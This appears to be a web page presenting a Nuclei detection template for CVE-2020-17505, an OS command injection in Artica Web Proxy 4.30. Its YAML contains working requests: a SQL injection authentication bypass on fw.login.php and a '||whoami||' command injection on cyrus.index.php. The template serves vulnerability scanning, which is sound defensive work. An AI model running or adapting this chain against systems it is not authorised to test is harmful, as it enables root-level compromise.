Artica Web Proxy 4.30 - OS Command Injection

ID: CVE-2020-17505

Severity: high

Author: dwisiswant0

Tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech

Description

Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.

YAML Source

id: CVE-2020-17505

info:
  name: Artica Web Proxy 4.30 - OS Command Injection
  author: dwisiswant0
  severity: high
  description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17505
    - https://blog.max0x4141.com/post/artica_proxy/
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-17505
    cwe-id: CWE-78
    epss-score: 0.95924
    epss-percentile: 0.99459
    cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: articatech
    product: web_proxy
  tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech

http:
  - raw:
      - |
        GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "array(2)"
          - "Position: ||whoami||"
          - "root"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf56a6f2b34f3a9ae5a4309e38cb1fc700dd39de3e29fcb613515916582baef402204c8e9a50938991ed4e204435e5256a37858258ed1750b55b803c1f46512952f2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17505.yaml"

View on Github